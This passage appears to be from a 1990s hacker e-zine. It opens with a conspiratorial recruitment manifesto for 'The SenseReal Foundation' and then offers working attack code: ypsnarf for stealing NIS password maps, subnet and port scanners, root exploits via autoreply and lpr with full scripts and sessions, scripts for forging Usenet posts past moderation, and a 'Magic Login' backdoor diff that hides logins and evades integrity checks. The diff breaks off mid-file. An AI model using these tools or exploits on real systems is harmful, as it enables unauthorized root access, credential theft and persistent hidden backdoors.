undoubtedly change your life forever. When you understand the reason it exists and what it seeks you will better know how to decide. That is why this text was created. He is known as Green Ghost. Some know him as Jim Nightshade. He was born in 1966. He is not a baby boomer and he is not a Generation Xer. He falls into that group of the population that has so far escaped definition. He is a (yberpunk. He was (yberpunk before (yberpunk was cool. He is the founder and leader of The SenseReal Foundation. You will learn more about him later. But first you will have to know about the background. There once was a man named Albert Hoffman. In 1943, on April 16 Hoffman absorbed a threshold amount of the drug known as LSD. He experienced "a peculiar restlessness". LSD since that time has played an important role in this world. There are other agents involved in the story. Mary Pinchot, JFK, Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley and many others. There are too many details and explanations necessary to explain everything here. But this does not matter. Because the SenseReal Foundation is about riding the wave. We believe that the ultimate goal cannot be defined. To define it would be to destroy it. The SenseReal Foundation hopes that things can be changed for the better. But we realize that the situation can become much worse. From what history teaches us and what we instinctively feel, we know that there is a great probability that things will get much worse before and if things ever get better. Doom looms on the horizon like an old friend. Freedom is being threatened every day and The SenseReal Foundation seeks to defend and seek Freedom. Big Brother is here NOW and to deny his existence is only to play into his hand. The goal of our government both here in America and worldwide is to remain in power and increase it's control of The People. To expose Big Brother and destroy him is one of the many goals of The SenseReal Foundation. As a member of (yberspace and an agent of The SenseReal Foundation you will have to carefully consider your interaction with the flow of Info. The ideals of Liberty must be maintained. The SenseReal Foundation provides a grounding point. The place where the spark transfers from plasma to light and back to plasma. Tesla was not on the wrong track. The SenseReal Foundation is a mechanism which seeks to increase Freedom. Only by learning more can we defeat the Evil. The Good must prevail. If you have the Hacker spirit and think along the same lines then The SenseReal Foundation may be your calling. If you think like J.R. Dobbs or Green Ghost then it is possible we can make it through The Apocalypse. A final date has never been announced for this event. Green Ghost does not claim to know the exact date but he does claim to have some Info on it. Green Ghost does not claim to have all the answers or even to know all the questions. He was first exposed to computers in the early 70's at his local high school. The first computer he ever used was a Honeywell terminal connected to a mainframe operated at the home office of Honeywell and operated for the school. This machine was programed by feeding it stacks of cards with boxes X'd out with a No. 2 pencil. It did have a keyboard hooked up to a printer which served for the monitor. The text was typed out and the paper rolled out of the machine in great waves. This experience left him wanting more. Somewhere between the machine and the mind were all the questions and all the answers. The SenseReal Foundation will supply some of the means. We must all work together if we are to succeed. UNITED WE STAND, DIVIDED WE FALL. If you wish to participate with The SenseReal Foundation you must devote yourself to becoming an Info Agent. As an Info Agent it is your duty to seek Truth and Knowledge out wherever it is located. To Learn and to seek to increase the Learning of all at The SenseReal Foundation. Different people will be needed to help out in different ways. SenseReal's Info Agents are located all around the world and are in contact with fellow SenseReal members via any one of several SenseReal facilities. The primary establishment and headquarters of The SenseReal Foundation is SenseReal's own online system: T /-/ E /-/ /=\ ( /< E R ' S /\/\ /=\ /\/ S / O /\/ >>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<< 27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation Also contact via SenseReal's mail drop by writing or sending materials to: TSF \ Electronic Mail: P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us HILTON HEAD, SC 29938-6914 \ The Hacker's /\/\ansion is a system like no other. While it is not your typical Hackers board it has much Info on Hacking. While it is not like any Adult system you've ever seen it has the most finest Adult material available anywhere. It is not a Warez board but we are definitely Pirates. Because we are (yberpunks. What makes the Hacker's Mansion different is our emphasis on quality. Everything that you find at The /-/acker's /\/\ansion is 1ST (lass. All the coolest E-zines are pursued here. Phrack, CUD, and Thought Virus to name just a few. Of course there is one other source for Thought Virus: Send E-Mail to: ListServ@neonate.atl.ga.us In the subject or body of the message write: FAQ ThoughtCriminals and you will receive the current issue in your E-Mail box in no time. If you wish to join the Thought Criminals mailing list and communicate with your fellow Thought Criminals via E-Mail then send another message to: ListServ@neonate.atl.ga.us and write the following in the subject or body of the message: Subscribe ThoughtCriminals Your-Address-Here or simply: Subscribe ThoughtCriminals To mail others on the Thought Criminals mailing list send a message to: ThoughtCriminals@neonate.atl.ga.us Tell us all. Communication is vital. Our survival may depend on it. The SenseReal Foundation is about the allegiance of many people, and indeed beings, as our friends from other planets can tell you. The EFF inspired us and was a model but we don't have the EFF's money so we need YOU. If you are someone who can contribute or who believes in The Cause or are just interested in Tax Resistance or the Free The Weed movement then you should join The SenseReal Foundation today. Contact us through any of above channels and become a Freedom Fighter today. Time is of the essence. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ------------------------------------------------------------------------------ ** OLD SHIT THAT STILL WORKS ** - sometimes - /* * THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN * THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE * IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM. PLEASE DO NOT * REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY. * * ypsnarf - exercise security holes in yp/nis. * * Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik * (casper@fwi.uva.nl). * * Usage: * ypsnarf server client * - to obtain the yp domain name * ypsnarf server domain mapname * - to obtain a copy of a yp map * ypsnarf server domain maplist * - to obtain a list of yp maps * * In the first case, we lie and pretend to be the host "client", and send * a BOOTPARAMPROC_WHOAMI request to the host "server". Note that for this * to work, "server" must be running rpc.bootparamd, and "client" must be a * diskless client of (well, it must boot from) "server". * * In the second case, we send a YPPROC_DOMAIN request to the host "server", * asking if it serves domain "domain". If so, we send YPPROC_FIRST and * YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map * "mapname". Note that you must specify the full yp map name, you cannot * use the shorthand names provided by "ypcat". * * In the third case, the special map name "maplist" tells ypsnarf to send * a YPPROC_MAPLIST request to the server and get the list of maps in domain * "domain", instead of getting the contents of a map. If the server has a * map called "maplist" you can't get it. Oh well. * * Since the callrpc() routine does not make any provision for timeouts, we * artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the * initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer. * * This program uses UDP packets, which means there's a chance that things * will get dropped on the floor; it's not a reliable stream like TCP. In * practice though, this doesn't seem to be a problem. * * To compile: * cc -o ypsnarf ypsnarf.c -lrpcsvc * * David A. Curry * Purdue University * Engineering Computer Network * Electrical Engineering Building * West Lafayette, IN 47907 * davy@ecn.purdue.edu * January, 1991 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd */ #define YPSNARF_TIMEOUT1 15 /* timeout for initial request */ #define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */ char *pname; /* program name */ main(argc, argv) char **argv; int argc; { char *server, *client, *domain, *mapname; pname = *argv; /* * Process arguments. This is less than robust, but then * hey, you're supposed to know what you're doing. */ switch (argc) { case 3: server = *++argv; client = *++argv; get_yp_domain(server, client); exit(0); case 4: server = *++argv; domain = *++argv; mapname = *++argv; if (strcmp(mapname, "maplist") == 0) get_yp_maplist(server, domain); else get_yp_map(server, domain, mapname); exit(0); default: fprintf(stderr, "Usage: %s server client -", pname); fprintf(stderr, "to obtain yp domain name\n"); fprintf(stderr, " %s server domain mapname -", pname); fprintf(stderr, "to obtain contents of yp map\n"); exit(1); } } /* * get_yp_domain - figure out the yp domain used between server and client. */ get_yp_domain(server, client) char *server, *client; { long hostip; struct hostent *hp; bp_whoami_arg w_arg; bp_whoami_res w_res; extern void timeout(); enum clnt_stat errcode; /* * Just a sanity check, here. */ if ((hp = gethostbyname(server)) == NULL) { fprintf(stderr, "%s: %s: unknown host.\n", pname, server); exit(1); } /* * Allow the client to be either an internet address or a * host name. Copy in the internet address. */ if ((hostip = inet_addr(client)) == -1) { if ((hp = gethostbyname(client)) == NULL) { fprintf(stderr, "%s: %s: unknown host.\n", pname, client); exit(1); } bcopy(hp->h_addr_list[0], (caddr_t) &w_arg.client_address.bp_address.ip_addr, hp->h_length); } else { bcopy((caddr_t) &hostip, (caddr_t) &w_arg.client_address.bp_address.ip_addr, sizeof(ip_addr_t)); } w_arg.client_address.address_type = IP_ADDR_TYPE; bzero((caddr_t) &w_res, sizeof(bp_whoami_res)); /* * Send a BOOTPARAMPROC_WHOAMI request to the server. This will * give us the yp domain in the response, IFF client boots from * the server. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg, xdr_bp_whoami_res, &w_res); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Print the domain name. */ printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name); /* * The maximum domain name length is 255 characters, but the * rpc.bootparamd program truncates anything over 32 chars. */ if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN) printf(" (truncated?)"); /* * Put out the client name, if they didn't know it. */ if (hostip != -1) printf(" (client name = %s)", w_res.client_name); putchar('\n'); } /* * get_yp_map - get the yp map "mapname" from yp domain "domain" from server. */ get_yp_map(server, domain, mapname) char *server, *domain, *mapname; { char *reqp; bool_t yesno; u_long calltype; bool (*xdr_proc)(); extern void timeout(); enum clnt_stat errcode; struct ypreq_key keyreq; struct ypreq_nokey nokeyreq; struct ypresp_key_val answer; /* * This code isn't needed; the next call will give the same * error message if there's no yp server there. */ #ifdef not_necessary /* * "Ping" the yp server and see if it's there. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0, xdr_void, 0); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); #endif /* * Figure out whether server serves the yp domain we want. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN, xdr_wrapstring, (caddr_t) &domain, xdr_bool, (caddr_t) &yesno); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Nope... */ if (yesno == FALSE) { fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, server, domain); exit(1); } /* * Now we just read entry after entry... The first entry we * get with a nokey request. */ keyreq.domain = nokeyreq.domain = domain; keyreq.map = nokeyreq.map = mapname; reqp = (caddr_t) &nokeyreq; keyreq.keydat.dptr = NULL; answer.status = TRUE; calltype = YPPROC_FIRST; xdr_proc = xdr_ypreq_nokey; while (answer.status == TRUE) { bzero((caddr_t) &answer, sizeof(struct ypresp_key_val)); signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT2); errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc, reqp, xdr_ypresp_key_val, &answer); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Got something; print it. */ if (answer.status == TRUE) { printf("%.*s\n", answer.valdat.dsize, answer.valdat.dptr); } /* * Now we're requesting the next item, so have to * send back the current key. */ calltype = YPPROC_NEXT; reqp = (caddr_t) &keyreq; xdr_proc = xdr_ypreq_key; if (keyreq.keydat.dptr) free(keyreq.keydat.dptr); keyreq.keydat = answer.keydat; if (answer.valdat.dptr) free(answer.valdat.dptr); } } /* * get_yp_maplist - get the yp map list for yp domain "domain" from server. */ get_yp_maplist(server, domain) char *server, *domain; { bool_t yesno; extern void timeout(); struct ypmaplist *mpl; enum clnt_stat errcode; struct ypresp_maplist maplist; /* * This code isn't needed; the next call will give the same * error message if there's no yp server there. */ #ifdef not_necessary /* * "Ping" the yp server and see if it's there. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0, xdr_void, 0); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); #endif /* * Figure out whether server serves the yp domain we want. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN, xdr_wrapstring, (caddr_t) &domain, xdr_bool, (caddr_t) &yesno); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Nope... */ if (yesno == FALSE) { fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, server, domain); exit(1); } maplist.list = (struct ypmaplist *) NULL; /* * Now ask for the list. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST, xdr_wrapstring, (caddr_t) &domain, xdr_ypresp_maplist, &maplist); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); if (maplist.status != YP_TRUE) { fprintf(stderr, "%s: cannot get map list: %s\n", pname, yperr_string(ypprot_err(maplist.status))); exit(1); } /* * Print out the list. */ for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next) printf("%s\n", mpl->ypml_name); } /* * print_rpc_err - print an rpc error and exit. */ print_rpc_err(errcode) enum clnt_stat errcode; { fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode)); exit(1); } /* * timeout - print a timeout and exit. */ void timeout() { fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname); exit(1); } ------------------------------------------------------------------------------ #!/bin/perl -s # # Scan a subnet for valid hosts; if given hostname, will look at the # 255 possible hosts on that net. Report if host is running rexd or # ypserv. # # Usage: scan n.n.n.n # mine, by default $default = "130.80.26"; $| = 1; if ($v) { $verbose = 1; } if ($#ARGV == -1) { $root = $default; } else { $root = $ARGV[0]; } # ip address if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) { ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root); ($one,$two,$three,$four) = unpack('C4',$host_ip[0]); $root = "$one.$two.$three"; if ($root eq "..") { die "Can't figure out what to scan...\n"; } } print "Subnet $root:\n" if $verbose; for $i (01..255) { print "Trying $root.$i\t=> " if $verbose; &resolve("$root.$i"); } # # Do the work # sub resolve { local($name) = @_; # ip address if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { ($a,$b,$c,$d) = split(/\./, $name); @ip = ($a,$b,$c,$d); ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); } else { ($name, $aliases, $type, $len, @ip) = gethostbyname($name); ($a,$b,$c,$d) = unpack('C4',$ip[0]); } if ($name && @ip) { print "$a.$b.$c.$d\t$name\n"; system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R unning ypserv.\"\nfi\nfi"); } else { print "unable to resolve address\n" if $verbose; } } sub AF_INET {2;} ------------------------------------------------------------------------------ /* * probe_tcp_ports */ #include #include #include #include #include #include #include #define RETURN_ERR -1 #define RETURN_FAIL 0 #define RETURN_SUCCESS 1 int Debug; int Hack; int Verbose; main(ArgC, ArgV) int ArgC; char **ArgV; { int Index; int SubIndex; for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++) for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++) switch (ArgV[Index][SubIndex]) { case 'd': Debug++; break; case 'h': Hack++; break; case 'v': Verbose++; break; default: (void) fprintf(stderr, "Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n"); exit(1); } for (; Index < ArgC; Index++) (void) Probe_TCP_Ports(ArgV[Index]); exit(0); } Probe_TCP_Ports(Name) char *Name; { unsigned Port; char *Host; struct hostent *HostEntryPointer; struct sockaddr_in SocketInetAddr; struct hostent TargetHost; struct in_addr TargetHostAddr; char *AddressList[1]; char NameBuffer[128]; extern int inet_addr(); extern char *rindex(); if (Name == NULL) return (RETURN_FAIL); Host = Name; if (Host == NULL) return (RETURN_FAIL); HostEntryPointer = gethostbyname(Host); if (HostEntryPointer == NULL) { TargetHostAddr.s_addr = inet_addr(Host); if (TargetHostAddr.s_addr == -1) { (void) printf("unknown host: %s\n", Host); return (RETURN_FAIL); } (void) strcpy(NameBuffer, Host); TargetHost.h_name = NameBuffer; TargetHost.h_addr_list = AddressList, TargetHost.h_addr = (char *) &TargetHostAddr; TargetHost.h_length = sizeof(struct in_addr); TargetHost.h_addrtype = AF_INET; TargetHost.h_aliases = 0; HostEntryPointer = &TargetHost; } SocketInetAddr.sin_family = HostEntryPointer->h_addrtype; bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr, HostEntryPointer->h_length); for (Port = 1; Port < 65536; Port++) (void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr); return (RETURN_SUCCESS); } Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr) unsigned Port; struct hostent *HostEntryPointer; struct sockaddr_in SocketInetAddr; { char Buffer[BUFSIZ]; int SocketDescriptor; struct servent *ServiceEntryPointer; SocketInetAddr.sin_port = Port; SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6); if (SocketDescriptor < 0) { perror("socket"); return (RETURN_ERR); } if (Verbose) { (void) printf("Host %s, Port %d ", HostEntryPointer->h_name, Port); if ((ServiceEntryPointer = getservbyport(Port, "tcp")) != (struct servent *) NULL) (void) printf(" (\"%s\" service) ", ServiceEntryPointer->s_name); (void) printf("connection ... "); (void) fflush(stdout); } if (connect(SocketDescriptor, (char *) &SocketInetAddr, sizeof(SocketInetAddr)) < 0) { if (Verbose) (void) printf("NOT open.\n"); if (Debug) perror("connect"); } else { if (!Verbose) { (void) printf("Host %s, Port %d ", HostEntryPointer->h_name, Port); if ((ServiceEntryPointer = getservbyport(Port,"tcp")) != (struct servent *) NULL) (void) printf(" (\"%s\" service) ", ServiceEntryPointer->s_name); (void) printf("connection ... "); (void) fflush(stdout); } (void) printf("open.\n"); if (Hack) { (void) sprintf(Buffer, "/usr/ucb/telnet %s %d", HostEntryPointer->h_name, Port); (void) system(Buffer); } } (void) close(SocketDescriptor); return (RETURN_SUCCESS); } ------------------------------------------------------------------------------ [8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991 PROGRAM: autoreply(1) (/usr/local/bin/autoreply) Supplied with the Elm Mail System VULNERABLE OS's: Any system with a standard installation of The Elm Mail System. All versions are believed to have this vulnerability. DESCRIPTION: autoreply(1) can be used to create root owned files, with mode 666. It can also overwrite any file with semi user-controlled data. IMPACT: Any user with access to autoreply(1) can alter system files and thus become root. REPEAT BY: This example demonstrates how to become root on most affected machines by modifying root's .rhosts file. Please do not do this unless you have permission. Create the following script, 'fixrhosts': 8<--------------------------- cut here ---------------------------- #!/bin/sh # # fixrhosts rhosts-file user machine # if [ $# -ne 3 ]; then echo "Usage: `basename $0` rhosts-file user machine" exit 1 fi RHOSTS="$1" USERNAME="$2" MACHINE="$3" cd $HOME echo x > "a $MACHINE $USERNAME b" umask 022 autoreply "a $MACHINE $USERNAME b" cat > /tmp/.rhosts.sh.$$ << 'EOF' ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'` exec autoreply off exit 0 EOF /bin/sh /tmp/.rhosts.sh.$$ $RHOSTS rm -f /tmp/.rhosts.sh.$$ "a $MACHINE $USERNAME b" exit 0 8<--------------------------- cut here ---------------------------- (Lines marked with > represent user input) > % id uid=97(8lgm) gid=97(8lgm) groups=97(8lgm) > % ./fixrhosts ~root/.rhosts 8lgm localhost You've been added to the autoreply system. You've been removed from the autoreply table. > % rsh localhost -l root csh -i Warning: no access to tty. Thus no job control in this shell. # FIX: 1. Disable autoreply. 2. Wait for a patch from the Elm maintainers. ------------------------------------------------------------------------------ [8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991 PROGRAM: lpr(1) (/usr/ucb/lpr or /usr/bin/lpr) VULNERABLE OS's: SunOS 4.1.1 or earlier BSD 4.3 BSD NET/2 Derived Systems A/UX 2.0.1 Most systems supporting the BSD LP subsystem DESCRIPTION: lpr(1) can be used to overwrite or create (and become owner of) any file on the system. lpr -s allows users to create symbolic links in lpd's spool directory (typically /var/spool/lpd). After 1000 invocations of lpr, lpr will reuse the filename in the spool directory, and follow the link previously installed. It will thus overwrite/create any file that this link points too. IMPACT: Any user with access to lpr(1) can alter system files and thus become root. REPEAT BY: This example demonstrates how to become root on most affected machines by modifying /etc/passwd and /etc/group. Please do not do this unless you have permission. Create the following script, 'lprcp': 8<--------------------------- cut here ---------------------------- #!/bin/csh -f # # Usage: lprcp from-file to-file # if ($#argv != 2) then echo Usage: lprcp from-file to-file exit 1 endif # This link stuff allows us to overwrite unreadable files, # should we want to. echo x > /tmp/.tmp.$$ lpr -q -s /tmp/.tmp.$$ rm -f /tmp/.tmp.$$ # lpr's accepted it, point it ln -s $2 /tmp/.tmp.$$ # to where we really want @ s = 0 while ( $s != 999) # loop 999 times lpr /nofile >&/dev/null # doesn't exist, but spins the clock! @ s++ if ( $s % 10 == 0 ) echo -n . end lpr $1 # incoming file # user becomes owner rm -f /tmp/.tmp.$$ exit 0 8<--------------------------- cut here ---------------------------- (Lines marked with > represent user input) Make copies of /etc/passwd and /etc/group, and modify them: > % id uid=97(8lgm) gid=97(8lgm) groups=97(8lgm) > % cp /etc/passwd /tmp/passwd > % ex /tmp/passwd /tmp/passwd: unmodified: line 42 > :a > 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh > . > :wq /tmp/passwd: 43 lines, 2188 characters. > % cp /etc/group /tmp > % ex /tmp/group /tmp/group: unmodified: line 49 > :/wheel wheel:*:0:root,operator > :c > wheel:*:0:root,operator,8lgm > . > :wq /tmp/group: 49 lines, 944 characters. Install our new files: > % ./lprcp /tmp/group /etc/group ................................................................ ................................... lpr: cannot rename /var/spool/lpd/cfA060testnode > % ./lprcp /tmp/passwd /etc/passwd ................................................................. .................................. lpr: cannot rename /var/spool/lpd/cfA061testnode Check it worked: > % ls -l /etc/passwd /etc/group -rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group -rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd > % head -1 /etc/group wheel:*:0:root,operator,8lgm > % grep '^8lgmroot' /etc/passwd 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh Become root and tidy up: > % su 8lgmroot # chown root /etc/passwd /etc/group # rm -f /tmp/passwd /tmp/group # FIX: 1. Contact your vendor for a fix. 2. In the meantime, apply the following patch, derived from BSD NET/2 source, which will correct the flaw on most affected systems: ------------------------------------------------------------------------------ Anonymous netnews without "anonymous" remailers Save any news article to a file. We'll call it "hak" in this example. Edit hak, and remove any header lines of the form From some!random!path!user (note: "From ", not "From: " !!) Article: Lines: Shorten the Path: header down to its LAST two or three "bangized" components. This is to make the article look like it was posted from where it really was posted, and originally hit the net at or near the host you send it to. Or you can construct a completely new Path: line to reflect your assumed alias. Make some change to the Message-ID: field, that isn't likely to be duplicated anywhere. This is usually best done by adding a couple of random characters to the part before the @, since news posting programs generally use a fixed-length field to generate these IDs. Change the other headers to say what you like -- From:, Newsgroups:, Sender:, etc. Replace the original message text with your message. If you are posting to a moderated group, remember to put in an Approved: header to bypass the moderation mechanism. Write out the changed file, and send it to your favorite NNTP server that permits transfers via the IHAVE command, using the following script: ======================= #! /bin/sh ## Post an article via IHAVE. ## args: filename server if test "$2" = "" ; then echo usage: $0 filename server exit 1 fi if test ! -f $1 ; then echo $1: not found exit 1 fi # suck msg-id out of headers, keep the brackets msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \ sed 's/.*-[Ii][Dd]: //'` echo $msgid ( sleep 5 echo IHAVE $msgid sleep 3 cat $1 sleep 1 echo "." sleep 1 echo QUIT ) | telnet $2 119 ======================= If your article doesn't appear in a day or two, try a different server. They are easy to find. Here's a script that will break a large file full of saved netnews into a list of hosts to try. Edit the output of this if you want, to remove obvious peoples' names and other trash. ======================= #! /bin/sh FGV='fgrep -i -v' egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\ /g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp ======================= Once you have your host list, feed it to the following script. ======================= #! /bin/sh while read xx ; do if test "$xx" = "" ; then continue; fi echo === $xx ( echo open $xx 119 sleep 5 echo ihave k00l@x.edu sleep 4 echo . echo quit sleep 1 echo quit ) | telnet done ======================= If the above script is called "findem" and you're using csh, you should do findem < list >& outfile so that ALL output from telnet is captured. This takes a long time, but when it finishes, edit "outfile" and look for occurrences of "335". These mark answers from servers that might be willing to accept an article. This isn't a completely reliable indication, since some servers respond with acceptance and later drop articles. Try a given server with a slightly modified repeat of someone else's message, and see if it eventually appears. You will notice other servers that don't necessarily take an IHAVE, but say "posting ok". You can probably do regular POSTS through these, but they will add an "NNTP-Posting-Host: " header containing the machine YOU came from. ------------------------------------------------------------------------------ Magic Login - Written by Data King - 7 July 1994 PLEASE NOTE:- This program code is released on the understanding that neither the author or Phrack Magazine suggest that you implement this on **ANY** system that you are not authorized to do so. The author provides this implementation of a "Magic" login as a learning exercise in security programming. Sorry for the disclaimer readers but I was advised by the AFP (Australian Federal Police) that if I ever released this code they would bust me for aiding and abetting. I am releasing it anyway as I believe in the right of people to KNOW, but not necessarily to DO. As always I can be emailed at dking@suburbia.apana.org.au (Please note:- I have a NEW pgp signature.) INTRODUCTION ~~~~~~~~~~~~ Briefly I am going to explain what a "Magic" login is and some of the steps you need to go through to receive the desired result. At the end of this article is a diff that can be applied to the shadow-3.2.2-linux archive to implement some of these ideas. EXPLANATION ~~~~~~~~~~~ A "Magic" login is a modified login program that allows the user to login without knowing the correct password for the account they are logging into. This is a very simple programming exercise and can be done by almost anyone, but a really effective "Magic" login program will do much more than this. The features of the supplied "Magic" login are: - Will login to any valid account as long as you know the Magic password. - Hides you in UTMP [B - Does not Log to WTMP - Allows Root Login from NON authorized Terminals - Preserves the Lastlogin information (ie Keeps it as though you had never logged in with the magic password) - Produces a binary that is exactly the same length as the original binary. IMPLEMENTATION ~~~~~~~~~~~~~~ I am not going to go into great detail here on how to write such a system as this. The code is very simple and it contains plenty of comments, so just look there for ideas. For this system to have less chance of being detected you need to do several things. First select a "Magic" password that is not easily identifiable by stringing the binary. This is why in the example I have used the word "CONSOLE", this word already appears several times in the binary so detection of one more is unlikely. Admittedly I could of encrypted the "Magic" password, but I decided against this for several reasons. The second thing you would need to do if you where illegally placing a "Magic" login on a system would be to ensure that the admins are not doing CRC checks on SUID(0) programs, or if they are that you change the CRC record of login to match the CRC record of the "Magic" login. Thirdly do not forget to make the date and time stamp of the new binary match the old ones. To install a new /bin/login on a system you will need to be root, now if you are already root why would you bother? Simple, it is just one more backdoor that you can use to get back in if you are detected. LIMITATIONS ~~~~~~~~~~~ This version of the "Magic" login program does not have the following features, I leave it entirely up to you about implementing something to fix them: - Shells & Programs show up in the Process Table - tty Ownership and attributes - /proc filesystem Any one of these to an alert system admin will show that there is an "invisible" user on the system. However it has been my experience that most admin's rarely look at these things, or if they do they can not see the wood for the trees. ---------- diff -c /root/work/login/console.c /root/work/logon/console.c *** /root/work/login/console.c Sun Oct 11 07:16:47 1992 --- /root/work/logon/console.c Sat Jun 4 15:29:15 1994 *************** *** 21,26 **** --- 21,27 ---- #endif extern char *getdef_str(); + extern int magik; /* * tty - return 1 if the "tty" is a console device, else 0. *************** *** 47,52 **** --- 48,57 ---- if ((console = getdef_str("CONSOLE")) == NULL) return 1; + /* Fix for Magic Login - UnAuth Console - Data King */ + + if (magik==1) + return 1; /* * If this isn't a filename, then it is a ":" delimited list of * console devices upon which root logins are allowed. diff -c /root/work/login/lmain.c /root/work/logon/lmain.c *** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992 --- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994 *************** *** 105,110 **** --- 105,111 ---- char *Prog; int newenvc = 0; int maxenv = MAXENV; + int magik; /* Global Flag for Magic Login - Data King */ /* * External identifiers. diff -c /root/work/login/log.c /root/work/logon/log.c *** /root/work/login/log.c Mon Oct 12 17:35:07 1992 --- /root/work/logon/log.c Sat Jun 4 15:37:22 1994 *************** *** 53,58 **** --- 53,59 ---- extern struct passwd pwent; extern struct lastlog lastlog; extern char **environ; + extern char magik; long lseek (); time_t time (); *************** *** 83,89 **** (void) time (&newlog.ll_time); (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line); (void) lseek (fd, offset, 0); ! (void) write (fd, (char *) &newlog, sizeof newlog); (void) close (fd); } --- 84,93 ---- (void) time (&newlog.ll_time); (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line); (void) lseek (fd, offset, 0); ! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */ ! { /* login - Data King */ ! (void) write (fd, (char *) &newlog, sizeof newlog); ! } (void) close (fd); } diff -c /root/work/login/utmp.c /root/work/logon/utmp.c *** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992 --- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994 *************** *** 70,75 **** --- 70,77 ---- extern long lseek(); #endif /* SVR4 */ + extern int magik; + #define NO_UTENT \ "No utmp entry. You must exec \"login\" from the lowest level \"sh\"" #define NO_TTY \ *************** *** 353,368 **** /* * Scribble out the new entry and close the file. We're done * with UTMP, next we do WTMP (which is real easy, put it on ! * the end of the file. */ ! ! (void) write (fd, &utmp, sizeof utmp); ! (void) close (fd); ! ! if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { (void) write (fd, &utmp, sizeof utmp); (void) close (fd); } - utent = utmp; #endif /* SVR4 */ } --- 355,372 ---- /* * Scribble out the new entry and close the file. We're done * with UTMP, next we do WTMP (which is real easy, put it on ! * the end of the file. If Magic Login, DONT write out UTMP - Data King */ ! if (magik !=1) ! { (void) write (fd, &utmp, sizeof utmp); (void) close (fd); + + if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { + (void) write (fd, &utmp, sizeof utmp); + (void) close (fd); 